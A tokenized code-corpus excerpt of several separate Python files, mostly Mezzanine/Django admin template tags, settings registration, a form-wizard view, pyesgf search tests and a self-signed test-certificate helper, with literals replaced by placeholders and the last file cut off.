<EOL> @ register . to_end_tag <EOL> def editable ( parsed , context , token ) : <EOL> """<STR_LIT>""" <EOL> def parse_field ( field ) : <EOL> field = field . split ( "<STR_LIT:.>" ) <EOL> obj = context . get ( field . pop ( <NUM_LIT:0> ) , None ) <EOL> attr = field . pop ( ) <EOL> while field : <EOL> obj = getattr ( obj , field . pop ( <NUM_LIT:0> ) ) <EOL> if callable ( obj ) : <EOL> obj = obj ( ) <EOL> return obj , attr <EOL> fields = [ parse_field ( f ) for f in token . split_contents ( ) [ <NUM_LIT:1> : ] ] <EOL> if fields : <EOL> fields = [ f for f in fields if len ( f ) == <NUM_LIT:2> and f [ <NUM_LIT:0> ] is fields [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> if not parsed . strip ( ) : <EOL> try : <EOL> parsed = "<STR_LIT>" . join ( [ str ( getattr ( * field ) ) for field in fields ] ) <EOL> except AttributeError : <EOL> pass <EOL> if settings . INLINE_EDITING_ENABLED and fields and "<STR_LIT>" in context : <EOL> obj = fields [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if isinstance ( obj , Model ) and is_editable ( obj , context [ "<STR_LIT>" ] ) : <EOL> field_names = "<STR_LIT:U+002C>" . join ( [ f [ <NUM_LIT:1> ] for f in fields ] ) <EOL> context [ "<STR_LIT>" ] = get_edit_form ( obj , field_names ) <EOL> context [ "<STR_LIT>" ] = parsed <EOL> t = get_template ( "<STR_LIT>" ) <EOL> return t . render ( context ) <EOL> return parsed <EOL> @ register . simple_tag <EOL> def try_url ( url_name ) : <EOL> """<STR_LIT>""" <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" ) <EOL> try : <EOL> url = reverse ( url_name ) <EOL> except NoReverseMatch : <EOL> return "<STR_LIT>" <EOL> return url <EOL> def admin_app_list ( request ) : <EOL> """<STR_LIT>""" <EOL> app_dict = { } <EOL> menu_order = { } <EOL> for ( group_index , group ) in enumerate ( settings . ADMIN_MENU_ORDER ) : <EOL> group_title , items = group <EOL> for ( item_index , item ) in enumerate ( items ) : <EOL> if isinstance ( item , ( tuple , list ) ) : <EOL> item_title , item = item <EOL> else : <EOL> item_title = None <EOL> menu_order [ item ] = ( group_index , group_title , <EOL> item_index , item_title ) <EOL> for ( model , model_admin ) in admin . site . _registry . items ( ) : <EOL> opts = model . _meta <EOL> in_menu = not hasattr ( model_admin , "<STR_LIT>" ) or model_admin . in_menu ( ) <EOL> if in_menu and request . user . has_module_perms ( opts . app_label ) : <EOL> perms = model_admin . get_model_perms ( request ) <EOL> admin_url_name = "<STR_LIT>" <EOL> if perms [ "<STR_LIT>" ] : <EOL> admin_url_name = "<STR_LIT>" <EOL> change_url = admin_url ( model , admin_url_name ) <EOL> else : <EOL> change_url = None <EOL> if perms [ "<STR_LIT>" ] : <EOL> admin_url_name = "<STR_LIT>" <EOL> add_url = admin_url ( model , admin_url_name ) <EOL> else : <EOL> add_url = None <EOL> if admin_url_name : <EOL> model_label = "<STR_LIT>" % ( opts . app_label , opts . object_name ) <EOL> try : <EOL> app_index , app_title , model_index , model_title = menu_order [ model_label ] <EOL> except KeyError : <EOL> app_index = None <EOL> app_title = opts . app_config . verbose_name . title ( ) <EOL> model_index = None <EOL> model_title = None <EOL> else : <EOL> del menu_order [ model_label ] <EOL> if not model_title : <EOL> model_title = capfirst ( model . _meta . verbose_name_plural ) <EOL> if app_title not in app_dict : <EOL> app_dict [ app_title ] = { <EOL> "<STR_LIT:index>" : app_index , <EOL> "<STR_LIT:name>" : app_title , <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> app_dict [ app_title ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:index>" : model_index , <EOL> "<STR_LIT>" : model_admin . get_model_perms ( request ) , <EOL> "<STR_LIT:name>" : model_title , <EOL> "<STR_LIT:object_name>" : opts . object_name , <EOL> "<STR_LIT>" : change_url , <EOL> "<STR_LIT>" : add_url <EOL> } ) <EOL> for ( item_url , item ) in menu_order . items ( ) : <EOL> app_index , app_title , item_index , item_title = item <EOL> try : <EOL> item_url = reverse ( item_url ) <EOL> except NoReverseMatch : <EOL> continue <EOL> if app_title not in app_dict : <EOL> app_dict [ app_title ] = { <EOL> "<STR_LIT:index>" : app_index , <EOL> "<STR_LIT:name>" : app_title , <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> app_dict [ app_title ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:index>" : item_index , <EOL> "<STR_LIT>" : { "<STR_LIT>" : True } , <EOL> "<STR_LIT:name>" : item_title , <EOL> "<STR_LIT>" : item_url , <EOL> } ) <EOL> app_list = list ( app_dict . values ( ) ) <EOL> sort = lambda x : ( x [ "<STR_LIT:index>" ] if x [ "<STR_LIT:index>" ] is not None else <NUM_LIT> , x [ "<STR_LIT:name>" ] ) <EOL> for app in app_list : <EOL> app [ "<STR_LIT>" ] . sort ( key = sort ) <EOL> app_list . sort ( key = sort ) <EOL> return app_list <EOL> @ register . inclusion_tag ( "<STR_LIT>" , <EOL> takes_context = True ) <EOL> def admin_dropdown_menu ( context ) : <EOL> """<STR_LIT>""" <EOL> user = context [ "<STR_LIT>" ] . user <EOL> template_vars = { } <EOL> if user . is_staff : <EOL> template_vars [ "<STR_LIT>" ] = admin_app_list ( <EOL> context [ "<STR_LIT>" ] ) <EOL> if user . is_superuser : <EOL> sites = Site . objects . all ( ) <EOL> else : <EOL> try : <EOL> sites = user . sitepermissions . sites . all ( ) <EOL> except ObjectDoesNotExist : <EOL> sites = Site . objects . none ( ) <EOL> template_vars [ "<STR_LIT>" ] = list ( sites ) <EOL> template_vars [ "<STR_LIT>" ] = current_site_id ( ) <EOL> template_vars [ "<STR_LIT>" ] = context [ "<STR_LIT>" ] <EOL> template_vars [ "<STR_LIT>" ] = context [ "<STR_LIT>" ] <EOL> return template_vars <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def app_list ( context ) : <EOL> """<STR_LIT>""" <EOL> context [ "<STR_LIT>" ] = admin_app_list ( context [ "<STR_LIT>" ] ) <EOL> return context <EOL> @ register . inclusion_tag ( "<STR_LIT>" , <EOL> takes_context = True ) <EOL> def recent_actions ( context ) : <EOL> """<STR_LIT>""" <EOL> return context <EOL> @ register . render_tag <EOL> def dashboard_column ( context , token ) : <EOL> """<STR_LIT>""" <EOL> column_index = int ( token . split_contents ( ) [ <NUM_LIT:1> ] ) <EOL> output = [ ] <EOL> for tag in settings . DASHBOARD_TAGS [ column_index ] : <EOL> t = Template ( "<STR_LIT>" % tuple ( tag . split ( "<STR_LIT:.>" ) ) ) <EOL> output . append ( t . render ( context ) ) <EOL> return "<STR_LIT>" . join ( output ) <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def translate_url ( context , language ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> request = context [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> return "<STR_LIT>" <EOL> view = resolve ( request . path ) <EOL> current_language = translation . get_language ( ) <EOL> translation . activate ( language ) <EOL> try : <EOL> url = reverse ( view . func , args = view . args , kwargs = view . kwargs ) <EOL> except NoReverseMatch : <EOL> try : <EOL> url_name = ( view . url_name if not view . namespace <EOL> else '<STR_LIT>' % ( view . namespace , view . url_name ) ) <EOL> url = reverse ( url_name , args = view . args , kwargs = view . kwargs ) <EOL> except NoReverseMatch : <EOL> url_name = "<STR_LIT>" + view . url_name <EOL> url = reverse ( url_name , args = view . args , kwargs = view . kwargs ) <EOL> translation . activate ( current_language ) <EOL> if context [ '<STR_LIT>' ] . META [ "<STR_LIT>" ] : <EOL> url += "<STR_LIT:?>" + context [ '<STR_LIT>' ] . META [ "<STR_LIT>" ] <EOL> return url </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from future . builtins import range <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from mezzanine . conf import register_setting <EOL> generic_comments = getattr ( settings , "<STR_LIT>" , "<STR_LIT>" ) == "<STR_LIT>" <EOL> if generic_comments : <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = False , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = None , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = <NUM_LIT:5> , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = False , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = list ( range ( getattr ( settings , "<STR_LIT>" , <NUM_LIT:1> ) , <EOL> getattr ( settings , "<STR_LIT>" , <NUM_LIT:5> ) + <NUM_LIT:1> ) ) , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from future . builtins import str as _str <EOL> from collections import defaultdict <EOL> from importlib import import_module <EOL> from django . apps import apps <EOL> from django . utils . module_loading import module_has_submodule <EOL> from mezzanine . pages . models import Page <EOL> from mezzanine . utils . importing import get_app_name_list <EOL> processors = defaultdict ( list ) <EOL> def processor_for ( content_model_or_slug , exact_page = False ) : <EOL> """<STR_LIT>""" <EOL> content_model = None <EOL> slug = "<STR_LIT>" <EOL> if isinstance ( content_model_or_slug , ( str , _str ) ) : <EOL> try : <EOL> parts = content_model_or_slug . split ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> content_model = apps . get_model ( * parts ) <EOL> except ( TypeError , ValueError , LookupError ) : <EOL> slug = content_model_or_slug <EOL> elif issubclass ( content_model_or_slug , Page ) : <EOL> content_model = content_model_or_slug <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> content_model_or_slug ) <EOL> def decorator ( func ) : <EOL> parts = ( func , exact_page ) <EOL> if content_model : <EOL> model_name = content_model . _meta . object_name . lower ( ) <EOL> processors [ model_name ] . insert ( <NUM_LIT:0> , parts ) <EOL> else : <EOL> processors [ "<STR_LIT>" % slug ] . insert ( <NUM_LIT:0> , parts ) <EOL> return func <EOL> return decorator <EOL> LOADED = False <EOL> def autodiscover ( ) : <EOL> """<STR_LIT>""" <EOL> global LOADED <EOL> if LOADED : <EOL> return <EOL> LOADED = True <EOL> for app in get_app_name_list ( ) : <EOL> try : <EOL> module = import_module ( app ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> try : <EOL> import_module ( "<STR_LIT>" % app ) <EOL> except : <EOL> if module_has_submodule ( module , "<STR_LIT>" ) : <EOL> raise </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> from importlib import import_module <EOL> from django . apps import apps <EOL> def path_for_import ( name ) : <EOL> """<STR_LIT>""" <EOL> return os . path . dirname ( os . path . abspath ( import_module ( name ) . __file__ ) ) <EOL> def import_dotted_path ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> module_path , member_name = path . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> module = import_module ( module_path ) <EOL> return getattr ( module , member_name ) <EOL> except ( ValueError , ImportError , AttributeError ) as e : <EOL> raise ImportError ( "<STR_LIT>" % ( path , e ) ) <EOL> def get_app_name_list ( ) : <EOL> for app in apps . get_app_configs ( ) : <EOL> yield app . name </s>
<s> import OpenSSL <EOL> def generate_cert_and_pkey ( as_string = True , passphrase = None ) : <EOL> key = OpenSSL . crypto . PKey ( ) <EOL> key . generate_key ( OpenSSL . crypto . TYPE_RSA , <NUM_LIT> ) <EOL> cert = OpenSSL . crypto . X509 ( ) <EOL> cert . set_version ( <NUM_LIT:3> ) <EOL> cert . set_serial_number ( <NUM_LIT:1> ) <EOL> cert . get_subject ( ) . CN = '<STR_LIT:127.0.0.1>' <EOL> cert . gmtime_adj_notBefore ( <NUM_LIT:0> ) <EOL> cert . gmtime_adj_notAfter ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> cert . set_issuer ( cert . get_subject ( ) ) <EOL> cert . set_pubkey ( key ) <EOL> cert . sign ( key , '<STR_LIT>' ) <EOL> if as_string : <EOL> args = [ OpenSSL . crypto . FILETYPE_PEM , key ] <EOL> if passphrase is not None : <EOL> args += [ '<STR_LIT>' , passphrase ] <EOL> cert = OpenSSL . crypto . dump_certificate ( OpenSSL . crypto . FILETYPE_PEM , cert ) <EOL> key = OpenSSL . crypto . dump_privatekey ( * args ) <EOL> return cert , key </s>
<s> """<STR_LIT>""" <EOL> from pyesgf . search import SearchConnection , not_equals <EOL> from . config import TEST_SERVICE <EOL> def test_context_freetext ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( query = "<STR_LIT>" ) <EOL> assert context . freetext_constraint == "<STR_LIT>" <EOL> def test_context_facets1 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> assert context . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_context_facets1 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = "<STR_LIT>" ) <EOL> assert context2 . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert context2 . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_context_facets_multivalue ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert context2 . hit_count > <NUM_LIT:0> <EOL> assert context2 . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert sorted ( context2 . facet_constraints . getall ( '<STR_LIT>' ) ) == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_context_facet_multivalue2 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' ) <EOL> assert context . facet_constraints . getall ( '<STR_LIT>' ) == [ '<STR_LIT>' ] <EOL> context2 = context . constrain ( model = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert sorted ( context2 . facet_constraints . getall ( '<STR_LIT>' ) ) == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_context_facet_multivalue3 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> ctx = conn . new_context ( project = '<STR_LIT>' , query = '<STR_LIT>' , experiment = '<STR_LIT>' ) <EOL> hits1 = ctx . hit_count <EOL> assert hits1 > <NUM_LIT:0> <EOL> ctx2 = conn . new_context ( project = '<STR_LIT>' , query = '<STR_LIT>' , <EOL> experiment = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> hits2 = ctx2 . hit_count <EOL> assert hits2 > hits1 <EOL> def test_context_facet_options ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' , <EOL> ensemble = '<STR_LIT>' , experiment = '<STR_LIT>' , <EOL> realm = '<STR_LIT>' <EOL> ) <EOL> assert context . get_facet_options ( ) . keys ( ) == [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def test_context_facets3 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = "<STR_LIT>" ) <EOL> results = context2 . search ( ) <EOL> result = results [ <NUM_LIT:0> ] <EOL> assert result . json [ '<STR_LIT>' ] == [ '<STR_LIT>' ] <EOL> assert result . json [ '<STR_LIT>' ] == [ '<STR_LIT>' ] <EOL> def test_facet_count ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = "<STR_LIT>" ) <EOL> counts = context2 . facet_counts <EOL> assert counts [ '<STR_LIT>' ] . keys ( ) == [ '<STR_LIT>' ] <EOL> assert counts [ '<STR_LIT>' ] . keys ( ) == [ '<STR_LIT>' ] <EOL> def test_distrib ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE , distrib = False ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> count1 = context . hit_count <EOL> conn2 = SearchConnection ( TEST_SERVICE , distrib = True ) <EOL> context = conn2 . new_context ( project = '<STR_LIT>' ) <EOL> count2 = context . hit_count <EOL> assert count1 < count2 <EOL> def test_constrain ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> count1 = context . hit_count <EOL> context = context . constrain ( model = "<STR_LIT>" ) <EOL> count2 = context . hit_count <EOL> assert count1 > count2 <EOL> def test_constrain_freetext ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , query = '<STR_LIT>' ) <EOL> assert context . freetext_constraint == '<STR_LIT>' <EOL> context = context . constrain ( experiment = '<STR_LIT>' ) <EOL> assert context . freetext_constraint == '<STR_LIT>' <EOL> def test_constrain_regression1 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in context . facet_constraints <EOL> context2 = context . constrain ( experiment = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in context . facet_constraints <EOL> def test_negative_facet ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' ) <EOL> hits1 = context . hit_count <EOL> print context . facet_counts [ '<STR_LIT>' ] <EOL> context2 = context . constrain ( experiment = '<STR_LIT>' ) <EOL> hits2 = context2 . hit_count <EOL> context3 = context . constrain ( experiment = not_equals ( '<STR_LIT>' ) ) <EOL> hits3 = context3 . hit_count <EOL> assert hits1 == hits2 + hits3 <EOL> def test_replica ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( <EOL> query = '<STR_LIT>' ) <EOL> assert context . hit_count > <NUM_LIT:1> <EOL> context = conn . new_context ( <EOL> query = '<STR_LIT>' , <EOL> replica = False ) <EOL> assert context . hit_count == <NUM_LIT:1> </s>
<s> import re <EOL> from django import forms <EOL> from django . shortcuts import redirect <EOL> from django . core . urlresolvers import reverse <EOL> from django . forms import formsets , ValidationError <EOL> from django . views . generic import TemplateView <EOL> from django . utils . datastructures import SortedDict <EOL> from django . utils . decorators import classonlymethod <EOL> from formwizard . storage import get_storage <EOL> from formwizard . storage . exceptions import NoFileStorageConfigured <EOL> from formwizard . forms import ManagementForm <EOL> def normalize_name ( name ) : <EOL> new = re . sub ( '<STR_LIT>' , '<STR_LIT>' , name ) <EOL> return new . lower ( ) . strip ( '<STR_LIT:_>' ) <EOL> class StepsHelper ( object ) : <EOL> def __init__ ( self , wizard ) : <EOL> self . _wizard = wizard <EOL> def __dir__ ( self ) : <EOL> return self . all <EOL> def __len__ ( self ) : <EOL> return self . count <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . _wizard , self . all ) <EOL> @ property <EOL> def all ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_form_list ( ) . keys ( ) <EOL> @ property <EOL> def count ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . all ) <EOL> @ property <EOL> def current ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _wizard . storage . current_step or self . first <EOL> @ property <EOL> def first ( self ) : <EOL> "<STR_LIT>" <EOL> return self . all [ <NUM_LIT:0> ] <EOL> @ property <EOL> def last ( self ) : <EOL> "<STR_LIT>" <EOL> return self . all [ - <NUM_LIT:1> ] <EOL> @ property <EOL> def next ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_next_step ( ) <EOL> @ property <EOL> def prev ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_prev_step ( ) <EOL> @ property <EOL> def index ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_step_index ( ) <EOL> @ property <EOL> def step0 ( self ) : <EOL> return int ( self . index ) <EOL> @ property <EOL> def step1 ( self ) : <EOL> return int ( self . index ) + <NUM_LIT:1> <EOL> class WizardView ( TemplateView ) : <EOL> """<STR_LIT>""" <EOL> storage_name = None <EOL> form_list = None <EOL> initial_dict = None <EOL> instance_dict = None <EOL> condition_dict = None <EOL> template_name = '<STR_LIT>' <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . form_list ) <EOL> @ classonlymethod <EOL> def as_view ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> initkwargs = cls . get_initkwargs ( * args , ** kwargs ) <EOL> return super ( WizardView , cls ) . as_view ( ** initkwargs ) <EOL> @ classmethod <EOL> def get_initkwargs ( cls , form_list , initial_dict = None , <EOL> instance_dict = None , condition_dict = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . update ( { <EOL> '<STR_LIT>' : initial_dict or { } , <EOL> '<STR_LIT>' : instance_dict or { } , <EOL> '<STR_LIT>' : condition_dict or { } , <EOL> } ) <EOL> init_form_list = SortedDict ( ) <EOL> assert len ( form_list ) > <NUM_LIT:0> , '<STR_LIT>' <EOL> for i , form in enumerate ( form_list ) : <EOL> if isinstance ( form , ( list , tuple ) ) : <EOL> init_form_list [ unicode ( form [ <NUM_LIT:0> ] ) ] = form [ <NUM_LIT:1> ] <EOL> else : <EOL> init_form_list [ unicode ( i ) ] = form <EOL> for form in init_form_list . itervalues ( ) : <EOL> if issubclass ( form , formsets . BaseFormSet ) : <EOL> form = form . form <EOL> for field in form . base_fields . itervalues ( ) : <EOL> if ( isinstance ( field , forms . FileField ) and <EOL> not hasattr ( cls , '<STR_LIT>' ) ) : <EOL> raise NoFileStorageConfigured <EOL> kwargs [ '<STR_LIT>' ] = init_form_list <EOL> return kwargs <EOL> def get_wizard_name ( self ) : <EOL> return normalize_name ( self . __class__ . __name__ ) <EOL> def get_prefix ( self ) : <EOL> return self . wizard_name <EOL> def get_form_list ( self ) : <EOL> """<STR_LIT>""" <EOL> form_list = SortedDict ( ) <EOL> for form_key , form_class in self . form_list . iteritems ( ) : <EOL> condition = self . condition_dict . get ( form_key , True ) <EOL> if callable ( condition ) : <EOL> condition = condition ( self ) <EOL> if condition : <EOL> form_list [ form_key ] = form_class <EOL> return form_list <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . wizard_name = self . get_wizard_name ( ) <EOL> self . prefix = self . get_prefix ( ) <EOL> self . storage = get_storage ( self . storage_name , self . prefix , request , <EOL> getattr ( self , '<STR_LIT>' , None ) ) <EOL> self . steps = StepsHelper ( self ) <EOL> response = super ( WizardView , self ) . dispatch ( request , * args , ** kwargs ) <EOL> self . storage . update_response ( response ) <EOL> return response <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . storage . reset ( ) <EOL> self . storage . current_step = self . steps . first <EOL> return self . render ( self . get_form ( ) ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> wizard_prev_step = self . request . POST . get ( '<STR_LIT>' , None ) <EOL> if wizard_prev_step and wizard_prev_step in self . get_form_list ( ) : <EOL> self . storage . current_step = wizard_prev_step <EOL> form = self . get_form ( <EOL> data = self . storage . get_step_data ( self . steps . current ) , <EOL> files = self . storage . get_step_files ( self . steps . current ) ) <EOL> return self . render ( form ) <EOL> management_form = ManagementForm ( self . request . POST , prefix = self . prefix ) <EOL> if not management_form . is_valid ( ) : <EOL> raise ValidationError ( <EOL> '<STR_LIT>' ) <EOL> form_current_step = management_form . cleaned_data [ '<STR_LIT>' ] <EOL> if ( form_current_step != self . steps . current and <EOL> self . storage . current_step is not None ) : <EOL> self . storage . current_step = form_current_step <EOL> form = self . get_form ( data = self . request . POST , files = self . request . FILES ) <EOL> if form . is_valid ( ) : <EOL> self . storage . set_step_data ( self . steps . current , self . process_step ( form ) ) <EOL> self . storage . set_step_files ( self . steps . current , self . process_step_files ( form ) ) <EOL> if self . steps . current == self . steps . last : <EOL> return self . render_done ( form , ** kwargs ) <EOL> else : <EOL> return self . render_next_step ( form ) <EOL> return self . render ( form ) <EOL> def render_next_step ( self , form , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> next_step = self . steps . next <EOL> new_form = self . get_form ( next_step , <EOL> data = self . storage . get_step_data ( next_step ) , <EOL> files = self . storage . get_step_files ( next_step ) ) <EOL> self . storage . current_step = next_step <EOL> return self . render ( new_form , ** kwargs ) <EOL> def render_done ( self , form , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> final_form_list = [ ] <EOL> for form_key in self . get_form_list ( ) : <EOL> form_obj = self . get_form ( step = form_key , <EOL> data = self . storage . get_step_data ( form_key ) , <EOL> files = self . storage . get_step_files ( form_key ) ) <EOL> if not form_obj . is_valid ( ) : <EOL> return self . render_revalidation_failure ( form_key , form_obj , ** kwargs ) <EOL> final_form_list . append ( form_obj ) <EOL> done_response = self . done ( final_form_list , ** kwargs ) <EOL> self . storage . reset ( ) <EOL> return done_response <EOL> def get_form_prefix ( self , step = None , form = None ) : <EOL> """<STR_LIT>""" <EOL> if step is None : <EOL> step = self . steps . current <EOL> return str ( step ) <EOL> def get_form_initial ( self , step ) : <EOL> """<STR_LIT>""" <EOL> return self . initial_dict . get ( step , { } ) <EOL> def get_form_instance ( self , step ) : <EOL> """<STR_LIT>""" <EOL> return self . instance_dict . get ( step , None ) <EOL> def get_form_kwargs ( self , step = None ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def get_form ( self , step = None , data = None , files = None ) : <EOL> """<STR_LIT>""" <EOL> if step is None : <EOL> step = self . steps . current <EOL> kwargs = self . get_form_kwargs ( step ) <EOL> kwargs . update ( { <EOL> '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : files , <EOL> '<STR_LIT>' : self . get_form_prefix ( step , self . form_list [ step ] ) , <EOL> '<STR_LIT>' : self . get_form_initial ( step ) , <EOL> } ) <EOL> if issubclass ( self . form_list [ step ] , forms . ModelForm ) : <EOL> kwargs . update ( { '<STR_LIT>' : self . get_form_instance ( step ) } ) <EOL> elif issubclass ( self . form_list [ step ] , forms . models . BaseModelFormSet ) : <EOL> kwargs . update ( { '<STR_LIT>' : self . get_form_instance ( step ) } ) <EOL> return self . form_list [ step ] ( ** kwargs ) <EOL> def process_step ( self , form ) : <EOL> """<STR_LIT>""" <EOL> return self . get_form_step_data ( form ) <EOL> def process_step_files ( self , form ) : <EOL> """<STR_LIT>""" <EOL> return self . get_form_step_files ( form ) <EOL> def render_revalidation_failure ( self , step , form , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . storage . current_step = step <EOL> return self . render ( form , ** kwargs ) <EOL> def get_form_step_data ( self , form ) : <EOL> """<STR_LIT>""" <EOL> return form . data <EOL> def 